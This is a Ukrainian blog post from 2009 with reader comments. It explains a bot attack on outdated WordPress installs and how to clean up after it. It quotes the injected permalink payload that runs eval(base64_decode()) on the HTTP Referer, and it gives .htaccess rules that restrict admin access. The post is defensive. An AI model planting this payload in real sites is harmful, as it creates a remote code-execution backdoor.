sitemap archive

Взломали ваш блог на Вордпресі. Не знаєте що робити? Тоді читайте!

в категорії wordpress фішки

Вчора пройшла хвиля атаки і взлому блогів на вордпресі. А якщо погуглити, то можемо зробити висновок, що пострадали тисячі сайтів.

Так в чому полягала суть? А суть в тому, що дехто запустив в мережу бота, що виявляв старі версії WordPress (до версії 2.8.4) і користуючись старим багом, реєстрував юзера і використовуючи певних шаблон посилання отримував адмінські права, потім під цим юзером міняв шаблон ЧПУ в налаштуваннях, а далі модифікував (заражав) код теми, щоб підсовувати відвідувачам вірус чи ще якусь фігню.

І хоч мій блог досі працює на одній із старих версій вордпресу, але його ця напасть минувала. А все тому, що бот визначав версію блога по мета-тегу, що автоматом прописує вордпрес в усі теми, а я цей тег давним давно в себе видалив. Про те, як видалити цей тег, я писав раніше в статті: корисні функції в functions.php — раджу і вам таке зробити ;)

А тим, хто вже пострадав від цього віруса, черв’яка, бота (називайте як хочете) потрібно зробити:

  • В налаштуваннях ЧПУ, поміняти з
    /%postname%/%&({${evаl(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
    на
    /%postname%/
    (у вас може відрізнятись структура, по аналогії я думаю зрозумієте :))
  • Найдіть останнього зареєстрованого користувача на вашому сайті і знищіть його! Швидше за все, це буде MikeWink E-mail: bugbeemershonyhe@gmail.com
  • Оновити WordPress до версії 2.8.4

Але якщо немає бажання оновлюватись і хочете покращити безпеку свого блогу, ви можете заборонити всім доступ до адмінки окрім себе, за допомогою невеличкої правки .htaccess
Звичайно, було б добре коли у вас постійний статичний IP-адрес, тоді тільки б його і вказали. А якщо у вас динамічна айпішка, то можете вказати діапазон
Для цього зробіть наступне:

  • зайдіть на сайт myip.ru аби дізнатись ваш IP адрес (способів дізнатись зовнішній айпі дуже багато, я привів самий простий для блондинок). Ви наприклад побачили: ВАШ IP-АДРЕС: 91.134.98.173
  • створіть файл .htaccess в папці wp-admin вашого блогу і пропишіть там наступне:
    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName "Access Control"
    AuthType Basic
    
    order deny,allow
    deny from all
    allow from 91.134.98.173
    

    а якщо у вас динамічна айпішка, то краще напишіть так:

    
    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName "Access Control"
    AuthType Basic
    
    order deny,allow
    deny from all
    allow from 91.134.0.0/255.255.0.0
    

    Детальніше про синтаксис директив Allow, Deny для Apache htaccess читайте тут.

  • Збережіть файл. Все.

Тепер, до адмінки вашого блогу зможете потрапити лише ви з вашого комп’ютера. А якщо ви будете в дорозі, або в інтернет-кафе і захочете, зайти в адмінку блога, а вас не буде пускати (швидше за все, ви побачите помилку 404), бо айпішка не входить у вказаний діапазон, то тоді вам потрібно буде зайти по фтп на хостинг і тимчасово переіменувати файл .htaccess. І тут мабудь хтось з вас подумав: «Це що, я ще й маю пароль на фтп пам’ятати для таких випадків?» — Ну а що ви хотіли, прийдеться жертувати зручністю заради безпеки. Це як у відомій цитаті: «Так вам шашечки или ехать?!»

Бережіть себе і бережіть свій блог.

13 коментарівrss-comments

[@] ]]>ELECTRIC]]> 7 Вересня 2009 09:10

Але якщо на сайті немає реєстрації користувачів і є лише один користувач , то ця проблема не є актуальна.

]]>lilumi]]> 7 Вересня 2009 10:22

ти знаєш, на рахунок цього, я не впевнений :) Можливо той бот реєструється в обхід звичайної системи реєстрації, користуючись якимось багом вордпресу.

 
 
[@] ]]>ELECTRIC]]> 7 Вересня 2009 22:54

щось дуже сумніавюся. перевірив на двох блогах. там по одному зареєстрованому адміну і все.

 
]]>virua]]> 8 Вересня 2009 09:48

Можу погодитися з думкою ELECTRIC’а, що в даному випадку ламають сайти, де є дозволена реєстрація користувачів. З власного досвіду: з 4-х моїх блогів на ВП інфіковано лише той, де є дозволена реєстрація.

]]>lilumi]]> 10 Вересня 2009 10:59

судячи з коментарів у Лекактуса: http://lecactus.ru/2009/09/06/4712/#comment-33308 — навіть при закритій реєстрації бот умудряється реєструватись

 
 
]]>Юрко Червоний™]]> 16 Вересня 2009 19:33

Я обмежив доступ по ір, у мене постійна адреса.

 
]]>Юрко Червоний™]]> 16 Вересня 2009 19:38

До речі, у мене всюди заборонене реєстрація. а також немає показу номеру версії. І всі сайто-блоґи цілі.

]]>lilumi]]> 16 Вересня 2009 19:40

правильно робиш

 
 
[@] ]]>Homelab]]> 20 Вересня 2009 20:53

Практика показує, що взламати можна все. рекомендую частіше робити бекапи, бо якщо блог стане популярним, то ламатимуть його однозначно… таке життя

 
]]>Макс]]> 2 Грудня 2010 09:29

Давно використовую .htaccess для обмеження доступу в адмін частину у сайтах які будую на вордпресі, і виявляється не дарма.

 
[@] ]]>Тетяна]]> 13 Грудня 2010 10:16

А якщо вже взломали,що тодi робити???

]]>lilumi]]> 13 Грудня 2010 12:46

ну якщо сайт не робочий, то відновити з бекапу, поміняти паролі і обновити вордпресс та плагіни

 
 
]]>Cleta]]> 6 Квітня 2019 21:24

DROP WIRELESS CHARGER has passed strict safety tests.

 

Ваш коментар

LilumiМене звати LiluMi, а це мій блоґ. Тут про веб-розробку та лайфхаки. Рекомендую підписатись на RSS Інформацію про мене читайте на сторінці me LiluMi
UA TOP Bloggers

Тобі передають привіт 56 медвежаток. Це підняло тобі настрій на 0,711 а в Австралії живе колібрі у якої дзьобик довжиною на 52.45см.